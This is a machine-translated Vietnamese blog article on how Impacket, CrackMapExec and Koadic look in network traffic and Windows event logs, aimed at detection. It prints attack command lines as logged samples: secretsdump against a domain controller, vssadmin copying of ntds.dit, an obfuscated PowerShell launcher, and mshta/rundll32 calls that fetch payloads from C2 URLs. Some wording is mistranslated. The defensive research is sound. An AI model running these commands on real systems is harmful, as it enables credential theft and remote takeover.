Prohoster > Blog > quản lý > Cách phát hiện các cuộc tấn công vào cơ sở hạ tầng Windows: khám phá các công cụ của hacker

Cách phát hiện các cuộc tấn công vào cơ sở hạ tầng Windows: khám phá các công cụ của hacker

Cách phát hiện các cuộc tấn công vào cơ sở hạ tầng Windows: khám phá các công cụ của hacker

Số lượng các cuộc tấn công vào khu vực doanh nghiệp đang tăng lên hàng năm: ví dụ trong năm 2017, có thêm 13% sự cố đặc biệt được ghi nhận hơn năm 2016 và vào cuối năm 2018 - Thêm 27% sự cốhơn thời kỳ trước. Bao gồm cả những công cụ làm việc chính là hệ điều hành Windows. Năm 2017-2018, APT Dragonfly, APT28, APT BùnNước thực hiện các cuộc tấn công vào các tổ chức chính phủ và quân sự ở Châu Âu, Bắc Mỹ và Ả Rập Saudi. Và chúng tôi đã sử dụng ba công cụ cho việc này - gói tin, CrackMapExec и Koadic. Mã nguồn của họ mở và có sẵn trên GitHub.

Điều đáng chú ý là những công cụ này không được sử dụng cho mục đích xâm nhập ban đầu mà để phát triển một cuộc tấn công bên trong cơ sở hạ tầng. Những kẻ tấn công sử dụng chúng ở các giai đoạn khác nhau của cuộc tấn công sau khi xâm nhập vào vành đai. Nhân tiện, điều này rất khó phát hiện và thường chỉ có sự trợ giúp của công nghệ xác định dấu vết của sự thỏa hiệp trong lưu lượng mạng hoặc các công cụ cho phép phát hiện hành động tích cực của kẻ tấn công sau khi hắn đã xâm nhập vào cơ sở hạ tầng. Các công cụ này cung cấp nhiều chức năng khác nhau, từ truyền tệp đến tương tác với sổ đăng ký và thực thi các lệnh trên máy từ xa. Chúng tôi đã tiến hành nghiên cứu các công cụ này để xác định hoạt động mạng của chúng.

Những gì chúng tôi cần làm:

  • Hiểu cách hoạt động của các công cụ hack. Tìm hiểu xem kẻ tấn công cần khai thác những gì và chúng có thể sử dụng công nghệ gì.
  • Tìm những gì không được các công cụ bảo mật thông tin phát hiện trong giai đoạn đầu của cuộc tấn công. Giai đoạn trinh sát có thể bị bỏ qua, vì kẻ tấn công là kẻ tấn công nội bộ hoặc do kẻ tấn công đang khai thác một lỗ hổng trong cơ sở hạ tầng mà trước đây chưa được biết đến. Có thể khôi phục toàn bộ chuỗi hành động của anh ta, do đó mong muốn phát hiện chuyển động tiếp theo.
  • Loại bỏ các kết quả dương tính giả khỏi các công cụ phát hiện xâm nhập. Chúng ta không được quên rằng khi một số hành động nhất định được phát hiện chỉ dựa trên cơ sở trinh sát thì thường xuyên có thể xảy ra lỗi. Thông thường trong cơ sở hạ tầng có đủ số cách, thoạt nhìn không thể phân biệt được với những cách hợp pháp, để lấy bất kỳ thông tin nào.

Những công cụ này mang lại cho kẻ tấn công những gì? Nếu đây là Impacket thì kẻ tấn công sẽ nhận được một thư viện lớn gồm các mô-đun có thể được sử dụng ở các giai đoạn tấn công khác nhau sau khi phá vỡ vành đai. Nhiều công cụ sử dụng mô-đun Impacket trong nội bộ - ví dụ: Metasploit. Nó có dcomexec và wmiexec để thực thi lệnh từ xa, secretdump để lấy tài khoản từ bộ nhớ được thêm từ Impacket. Do đó, việc phát hiện chính xác hoạt động của thư viện như vậy sẽ đảm bảo phát hiện được các dẫn xuất.

Không phải ngẫu nhiên mà những người sáng tạo đã viết “Powered by Impacket” về CrackMapExec (hoặc đơn giản là CME). Ngoài ra, CME còn có chức năng được tạo sẵn cho các tình huống phổ biến: Mimikatz để lấy mật khẩu hoặc hàm băm của chúng, triển khai Meterpreter hoặc Empire Agent để thực thi từ xa và Bloodhound trên tàu.

Công cụ thứ ba chúng tôi chọn là Koadic. Nó khá gần đây, nó đã được trình bày tại hội nghị hacker quốc tế DEFCON 25 năm 2017 và nổi bật bởi cách tiếp cận không chuẩn: nó hoạt động thông qua HTTP, Java Script và Microsoft Visual Basic Script (VBS). Cách tiếp cận này được gọi là sống ngoài đất liền: công cụ này sử dụng một tập hợp các phần phụ thuộc và thư viện được tích hợp trong Windows. Những người sáng tạo gọi nó là COM Command & Control, hay C3.

IMPACKET

Chức năng của Impacket rất rộng, từ trinh sát bên trong AD và thu thập dữ liệu từ máy chủ MS SQL nội bộ, đến các kỹ thuật lấy thông tin xác thực: đây là một cuộc tấn công chuyển tiếp SMB và lấy tệp ntds.dit chứa băm mật khẩu người dùng từ bộ điều khiển miền. Impacket cũng thực thi các lệnh từ xa bằng bốn phương pháp khác nhau: WMI, Dịch vụ quản lý bộ lập lịch Windows, DCOM và SMB, đồng thời yêu cầu thông tin xác thực để thực hiện việc đó.

Bí mật

Chúng ta hãy nhìn vào secretdump. Đây là mô-đun có thể nhắm mục tiêu vào cả máy người dùng và bộ điều khiển miền. Nó có thể được sử dụng để lấy bản sao của các vùng bộ nhớ LSA, SAM, SECURITY, NTDS.dit, vì vậy nó có thể được nhìn thấy ở các giai đoạn khác nhau của cuộc tấn công. Bước đầu tiên trong hoạt động của mô-đun là xác thực thông qua SMB, yêu cầu mật khẩu của người dùng hoặc hàm băm của nó để tự động thực hiện cuộc tấn công Pass the Hash. Tiếp theo là yêu cầu mở quyền truy cập vào Trình quản lý điều khiển dịch vụ (SCM) và giành quyền truy cập vào sổ đăng ký thông qua giao thức winreg, bằng cách sử dụng giao thức này, kẻ tấn công có thể tìm ra dữ liệu của các nhánh quan tâm và nhận được kết quả thông qua SMB.

Trong bộ lễ phục. 1, chúng ta thấy chính xác cách sử dụng giao thức winreg, quyền truy cập được lấy bằng khóa đăng ký có LSA. Để thực hiện việc này, hãy sử dụng lệnh DCERPC với opcode 15 - OpenKey.

Cách phát hiện các cuộc tấn công vào cơ sở hạ tầng Windows: khám phá các công cụ của hacker
Cơm. 1. Mở khóa đăng ký bằng giao thức winreg

Tiếp theo, khi có được quyền truy cập vào khóa, các giá trị sẽ được lưu bằng lệnh SaveKey với opcode 20. Impacket thực hiện điều này theo một cách rất cụ thể. Nó lưu các giá trị vào một tệp có tên là một chuỗi gồm 8 ký tự ngẫu nhiên được nối với .tmp. Ngoài ra, việc tải lên thêm tệp này diễn ra thông qua SMB từ thư mục System32 (Hình 2).

Cách phát hiện các cuộc tấn công vào cơ sở hạ tầng Windows: khám phá các công cụ của hacker
Cơm. 2. Lược đồ lấy khóa đăng ký từ máy từ xa

Hóa ra hoạt động như vậy trên mạng có thể được phát hiện bằng các truy vấn tới các nhánh đăng ký nhất định bằng cách sử dụng giao thức winreg, tên cụ thể, lệnh và thứ tự của chúng.

Mô-đun này cũng để lại dấu vết trong nhật ký sự kiện của Windows, giúp dễ dàng phát hiện. Ví dụ, do thực hiện lệnh

secretsdump.py -debug -system SYSTEM -sam SAM -ntds NTDS -security SECURITY -bootkey BOOTKEY -outputfile 1.txt -use-vss -exec-method mmcexec -user-status -dc-ip 192.168.202.100 -target-ip 192.168.202.100 contoso/Administrator:@DC

Trong nhật ký Windows Server 2016, chúng ta sẽ thấy chuỗi sự kiện chính sau:

1. 4624 - Đăng nhập từ xa.
2. 5145 - kiểm tra quyền truy cập vào dịch vụ từ xa winreg.
3. 5145 - kiểm tra quyền truy cập file trong thư mục System32. Tệp có tên ngẫu nhiên được đề cập ở trên.
4. 4688 - tạo tiến trình cmd.exe khởi chạy vssadmin:

“C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C vssadmin list shadows ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat

5. 4688 - tạo một tiến trình bằng lệnh:

"C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C vssadmin create shadow /For=C: ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat

6. 4688 - tạo một tiến trình bằng lệnh:

"C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C copy ?GLOBALROOTDeviceHarddiskVolumeShadowCopy3WindowsNTDSntds.dit %SYSTEMROOT%TemprmumAfcn.tmp ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat

7. 4688 - tạo một tiến trình bằng lệnh:

"C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C vssadmin delete shadows /For=C: /Quiet ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat

Smbexec

Giống như nhiều công cụ sau khai thác, Impacket có các mô-đun để thực thi lệnh từ xa. Chúng ta sẽ tập trung vào smbexec, cung cấp shell lệnh tương tác trên máy từ xa. Mô-đun này cũng yêu cầu xác thực qua SMB, bằng mật khẩu hoặc hàm băm mật khẩu. Trong bộ lễ phục. Trong Hình 3, chúng ta thấy một ví dụ về cách hoạt động của một công cụ như vậy, trong trường hợp này nó là bảng điều khiển dành cho quản trị viên cục bộ.

Cách phát hiện các cuộc tấn công vào cơ sở hạ tầng Windows: khám phá các công cụ của hacker
Cơm. 3. Bảng điều khiển smbexec tương tác

Bước đầu tiên của smbexec sau khi xác thực là mở SCM bằng lệnh OpenSCManagerW (15). Truy vấn đáng chú ý: trường MachineName là DUMMY.

Cách phát hiện các cuộc tấn công vào cơ sở hạ tầng Windows: khám phá các công cụ của hacker
Cơm. 4. Yêu cầu mở Service Control Manager

Tiếp theo, dịch vụ được tạo bằng lệnh CreateServiceW (12). Trong trường hợp của smbexec, chúng ta có thể thấy logic xây dựng lệnh giống nhau ở mọi thời điểm. Trong bộ lễ phục. 5 màu xanh lá cây biểu thị các tham số lệnh không thể thay đổi, màu vàng biểu thị những gì kẻ tấn công có thể thay đổi. Dễ dàng nhận thấy rằng tên của tệp thực thi, thư mục của nó và tệp đầu ra có thể được thay đổi, nhưng phần còn lại khó thay đổi hơn nhiều mà không làm ảnh hưởng đến logic của mô-đun Impacket.

Cách phát hiện các cuộc tấn công vào cơ sở hạ tầng Windows: khám phá các công cụ của hacker
Cơm. 5. Yêu cầu tạo dịch vụ bằng Service Control Manager

Smbexec cũng để lại dấu vết rõ ràng trong nhật ký sự kiện Windows. Trong nhật ký Windows Server 2016 cho shell lệnh tương tác với lệnh ipconfig, chúng ta sẽ thấy chuỗi sự kiện chính sau:

1. 4697 — cài đặt dịch vụ trên máy của nạn nhân:

%COMSPEC% /Q /c echo cd ^> 127.0.0.1C$__output 2^>^&1 > %TEMP%execute.bat & %COMSPEC% /Q /c %TEMP%execute.bat & del %TEMP%execute.bat

2. 4688 - tạo quy trình cmd.exe với các đối số từ điểm 1.
3. 5145 - kiểm tra quyền truy cập vào tệp __output trong thư mục C$.
4. 4697 — cài đặt dịch vụ trên máy của nạn nhân.

%COMSPEC% /Q /c echo ipconfig ^> 127.0.0.1C$__output 2^>^&1 > %TEMP%execute.bat & %COMSPEC% /Q /c %TEMP%execute.bat & del %TEMP%execute.bat

5. 4688 - tạo quy trình cmd.exe với các đối số từ điểm 4.
6. 5145 - kiểm tra quyền truy cập vào tệp __output trong thư mục C$.

Impacket là cơ sở để phát triển các công cụ tấn công. Nó hỗ trợ hầu hết tất cả các giao thức trong cơ sở hạ tầng Windows, đồng thời có các tính năng đặc trưng riêng. Dưới đây là các yêu cầu winreg cụ thể và việc sử dụng API SCM với tính năng hình thành lệnh đặc trưng cũng như định dạng tên tệp và chia sẻ SMB SYSTEM32.

CRACKMAPEXEC

Công cụ CME được thiết kế chủ yếu để tự động hóa các hành động thông thường mà kẻ tấn công phải thực hiện để tiến sâu vào mạng. Nó cho phép bạn làm việc cùng với đặc vụ Empire và Meterpreter nổi tiếng. Để thực thi các lệnh một cách bí mật, CME có thể làm xáo trộn chúng. Sử dụng Bloodhound (một công cụ trinh sát riêng), kẻ tấn công có thể tự động hóa việc tìm kiếm phiên quản trị viên miền đang hoạt động.

Bloodhound

Bloodhound, như một công cụ độc lập, cho phép trinh sát nâng cao trong mạng. Nó thu thập dữ liệu về người dùng, máy, nhóm, phiên và được cung cấp dưới dạng tập lệnh PowerShell hoặc tệp nhị phân. Các giao thức dựa trên LDAP hoặc SMB được sử dụng để thu thập thông tin. Mô-đun tích hợp CME cho phép tải Bloodhound xuống máy của nạn nhân, chạy và nhận dữ liệu thu thập được sau khi thực thi, từ đó tự động hóa các hành động trong hệ thống và khiến chúng ít bị chú ý hơn. Vỏ đồ họa Bloodhound trình bày dữ liệu được thu thập dưới dạng biểu đồ, cho phép bạn tìm đường đi ngắn nhất từ ​​máy của kẻ tấn công đến quản trị viên tên miền.

Cách phát hiện các cuộc tấn công vào cơ sở hạ tầng Windows: khám phá các công cụ của hacker
Cơm. 6. Giao diện Bloodhound

Để chạy trên máy của nạn nhân, mô-đun này tạo một tác vụ bằng ATSVC và SMB. ATSVC là một giao diện để làm việc với Bộ lập lịch tác vụ Windows. CME sử dụng chức năng NetrJobAdd(1) của nó để tạo các tác vụ qua mạng. Một ví dụ về những gì mô-đun CME gửi được hiển thị trong Hình. 7: Đây là lệnh gọi cmd.exe và mã bị xáo trộn ở dạng đối số ở định dạng XML.

Cách phát hiện các cuộc tấn công vào cơ sở hạ tầng Windows: khám phá các công cụ của hacker
Hình 7. Tạo tác vụ thông qua CME

Sau khi nhiệm vụ được gửi đi để thực thi, máy của nạn nhân sẽ tự khởi động Bloodhound và điều này có thể được nhìn thấy trong lưu lượng truy cập. Mô-đun này được đặc trưng bởi các truy vấn LDAP để lấy các nhóm tiêu chuẩn, danh sách tất cả các máy và người dùng trong miền và lấy thông tin về các phiên người dùng đang hoạt động thông qua yêu cầu SRVSVC NetSessEnum.

Cách phát hiện các cuộc tấn công vào cơ sở hạ tầng Windows: khám phá các công cụ của hacker
Cơm. 8. Lấy danh sách các phiên hoạt động qua SMB

Ngoài ra, việc khởi chạy Bloodhound trên máy của nạn nhân đã bật kiểm tra sẽ đi kèm với một sự kiện có ID 4688 (tạo quy trình) và tên quy trình. «C:WindowsSystem32cmd.exe». Điều đáng chú ý ở đây là các đối số dòng lệnh:

cmd.exe /Q /c powershell.exe -exec bypass -noni -nop -w 1 -C " & ( $eNV:cOmSPEc[4,26,25]-JOiN'')( [chAR[]](91 , 78, 101,116 , 46, 83 , 101 , … , 40,41 )-jOIN'' ) "

Enum_avproducts

Mô-đun enum_avproducts rất thú vị từ quan điểm về chức năng và cách triển khai. WMI cho phép bạn sử dụng ngôn ngữ truy vấn WQL để truy xuất dữ liệu từ nhiều đối tượng Windows khác nhau, về cơ bản đây là ngôn ngữ mà mô-đun CME này sử dụng. Nó tạo ra các truy vấn tới các lớp AntiSpywareProduct và AntiМirusProduct về các công cụ bảo vệ được cài đặt trên máy của nạn nhân. Để có được dữ liệu cần thiết, mô-đun kết nối với không gian tên rootSecurityCenter2, sau đó tạo truy vấn WQL và nhận phản hồi. Trong bộ lễ phục. Hình 9 hiển thị nội dung của các yêu cầu và phản hồi đó. Trong ví dụ của chúng tôi, Windows Defender đã được tìm thấy.

Cách phát hiện các cuộc tấn công vào cơ sở hạ tầng Windows: khám phá các công cụ của hacker
Cơm. 9. Hoạt động mạng của module enum_avproducts

Thông thường, tính năng kiểm tra WMI (Trace WMI-Activity), trong các sự kiện mà bạn có thể tìm thấy thông tin hữu ích về truy vấn WQL, có thể bị vô hiệu hóa. Nhưng nếu nó được bật thì nếu tập lệnh enum_avproducts được chạy, một sự kiện có ID 11 sẽ được lưu. Nó sẽ chứa tên của người dùng đã gửi yêu cầu và tên trong không gian tên rootSecurityCenter2.

Mỗi mô-đun CME đều có các tạo phẩm riêng, có thể là các truy vấn WQL cụ thể hoặc tạo một loại tác vụ nhất định trong bộ lập lịch tác vụ với chức năng che giấu mã nguồn và hoạt động dành riêng cho Bloodhound trong LDAP và SMB.

KOADIC

Một tính năng đặc biệt của Koadic là việc sử dụng trình thông dịch JavaScript và VBScript được tích hợp trong Windows. Theo nghĩa này, nó đi theo xu hướng sống ngoài đất liền - nghĩa là nó không có sự phụ thuộc bên ngoài và sử dụng các công cụ Windows tiêu chuẩn. Đây là một công cụ dành cho Lệnh & Kiểm soát (CnC) đầy đủ, vì sau khi bị lây nhiễm, một “bộ cấy” sẽ được cài đặt trên máy, cho phép nó được điều khiển. Một cỗ máy như vậy, theo thuật ngữ của Koadic, được gọi là “thây ma”. Nếu nạn nhân không có đủ đặc quyền để thực hiện toàn bộ hoạt động, Koadic có khả năng nâng cao chúng bằng kỹ thuật bỏ qua Kiểm soát tài khoản người dùng (UAC bypass).

Cách phát hiện các cuộc tấn công vào cơ sở hạ tầng Windows: khám phá các công cụ của hacker
Cơm. 10. Vỏ Koadic

Nạn nhân phải bắt đầu liên lạc với máy chủ Command & Control. Để làm điều này, cô ấy cần liên hệ với URI đã chuẩn bị trước đó và nhận nội dung Koadic chính bằng cách sử dụng một trong các stager. Trong bộ lễ phục. Hình 11 cho thấy một ví dụ về trình tạo giai đoạn mshta.

Cách phát hiện các cuộc tấn công vào cơ sở hạ tầng Windows: khám phá các công cụ của hacker
Cơm. 11. Khởi tạo phiên làm việc với máy chủ CnC

Dựa trên biến phản hồi WS, có thể thấy rõ rằng việc thực thi diễn ra thông qua WScript.Shell và các biến STAGER, SESSIONKEY, JOBKEY, JOBKEYPATH, EXPIRE chứa thông tin chính về các tham số của phiên hiện tại. Đây là cặp yêu cầu-phản hồi đầu tiên trong kết nối HTTP với máy chủ CnC. Các yêu cầu tiếp theo liên quan trực tiếp đến chức năng của các mô-đun được gọi (bộ cấy). Tất cả các mô-đun Koadic chỉ hoạt động với phiên hoạt động với CnC.

Mimikatz

Giống như CME làm việc với Bloodhound, Koadic làm việc với Mimikatz như một chương trình riêng biệt và có nhiều cách để khởi chạy nó. Dưới đây là cặp yêu cầu-phản hồi để tải xuống bộ cấy Mimikatz.

Cách phát hiện các cuộc tấn công vào cơ sở hạ tầng Windows: khám phá các công cụ của hacker
Cơm. 12. Chuyển Mimikatz sang Koadic

Bạn có thể thấy định dạng URI trong yêu cầu đã thay đổi như thế nào. Bây giờ nó chứa một giá trị cho biến csrf, biến này chịu trách nhiệm cho mô-đun đã chọn. Đừng chú ý đến tên của cô ấy; Chúng ta đều biết rằng CSRF thường được hiểu khác nhau. Phản hồi là nội dung chính của Koadic, trong đó mã liên quan đến Mimikatz đã được thêm vào. Nó khá lớn, vì vậy hãy nhìn vào những điểm chính. Ở đây chúng ta có thư viện Mimikatz được mã hóa bằng base64, một lớp .NET được tuần tự hóa sẽ đưa vào nó và các đối số để khởi chạy Mimikatz. Kết quả thực hiện được truyền qua mạng dưới dạng văn bản rõ ràng.

Cách phát hiện các cuộc tấn công vào cơ sở hạ tầng Windows: khám phá các công cụ của hacker
Cơm. 13. Kết quả chạy Mimikatz trên máy từ xa

Thực thi_cmd

Koadic cũng có các mô-đun có thể thực thi lệnh từ xa. Ở đây chúng ta sẽ thấy cùng một phương thức tạo URI và các biến sid và csrf quen thuộc. Trong trường hợp mô-đun exec_cmd, mã được thêm vào phần thân có khả năng thực thi các lệnh shell. Dưới đây được hiển thị mã như vậy có trong phản hồi HTTP của máy chủ CnC.

Cách phát hiện các cuộc tấn công vào cơ sở hạ tầng Windows: khám phá các công cụ của hacker
Cơm. 14. Mã cấy ghép exec_cmd

Biến GAWUUGCFI với thuộc tính WS quen thuộc là bắt buộc để thực thi mã. Với sự trợ giúp của nó, bộ cấy gọi shell, xử lý hai nhánh mã - shell.exec với sự trả về luồng dữ liệu đầu ra và shell.run mà không quay lại.

Koadic không phải là một công cụ điển hình, nhưng nó có những đặc điểm riêng mà nhờ đó nó có thể được tìm thấy trong lưu lượng truy cập hợp pháp:

  • sự hình thành đặc biệt của các yêu cầu HTTP,
  • sử dụng API winHttpRequests,
  • tạo đối tượng WScript.Shell thông qua ActiveXObject,
  • cơ thể thực thi lớn.

Kết nối ban đầu được khởi tạo bởi stager, do đó có thể phát hiện hoạt động của nó thông qua các sự kiện của Windows. Đối với mshta, đây là sự kiện 4688, cho biết việc tạo một quy trình có thuộc tính bắt đầu:

C:Windowssystem32mshta.exe http://192.168.211.1:9999/dXpT6

Trong khi Koadic đang chạy, bạn có thể thấy 4688 sự kiện khác với các thuộc tính đặc trưng hoàn hảo cho nó:

rundll32.exe http://192.168.241.1:9999/dXpT6?sid=1dbef04007a64fba83edb3f3928c9c6c; csrf=;......mshtml,RunHTMLApplication
rundll32.exe http://192.168.202.136:9999/dXpT6?sid=12e0bbf6e9e5405690e5ede8ed651100;csrf=18f93a28e0874f0d8d475d154bed1983;......mshtml,RunHTMLApplication
"C:Windowssystem32cmd.exe" /q /c chcp 437 & net session 1> C:Usersuser02AppDataLocalTemp6dc91b53-ddef-2357-4457-04a3c333db06.txt 2>&1
"C:Windowssystem32cmd.exe" /q /c chcp 437 & ipconfig 1> C:Usersuser02AppDataLocalTemp721d2d0a-890f-9549-96bd-875a495689b7.txt 2>&1

Những phát hiện

Xu hướng sống nhờ đất đai đang ngày càng phổ biến trong giới tội phạm. Họ sử dụng các công cụ và cơ chế được tích hợp trong Windows cho nhu cầu của họ. Chúng tôi đang thấy các công cụ phổ biến Koadic, CrackMapExec và Impacket tuân theo nguyên tắc này ngày càng xuất hiện nhiều hơn trong các báo cáo APT. Số lượng các nhánh trên GitHub dành cho các công cụ này cũng đang tăng lên và những công cụ mới đang xuất hiện (hiện đã có khoảng một nghìn công cụ như vậy). Xu hướng này đang trở nên phổ biến do tính đơn giản của nó: kẻ tấn công không cần công cụ của bên thứ ba; chúng đã có sẵn trên máy của nạn nhân và giúp họ vượt qua các biện pháp bảo mật. Chúng tôi tập trung nghiên cứu giao tiếp mạng: mỗi công cụ được mô tả ở trên đều để lại dấu vết riêng trong lưu lượng mạng; nghiên cứu chi tiết về chúng cho phép chúng tôi dạy sản phẩm của mình Khám phá tấn công mạng PT phát hiện chúng, điều này cuối cùng giúp điều tra toàn bộ chuỗi sự cố mạng liên quan đến chúng.

Tác giả:

  • Anton Tyurin, Trưởng phòng Dịch vụ Chuyên gia, Trung tâm An ninh Chuyên gia PT, Công nghệ Tích cực
  • Egor Podmokov, chuyên gia, Trung tâm bảo mật chuyên gia PT, Công nghệ tích cực

Nguồn: www.habr.com

Thêm một lời nhận xét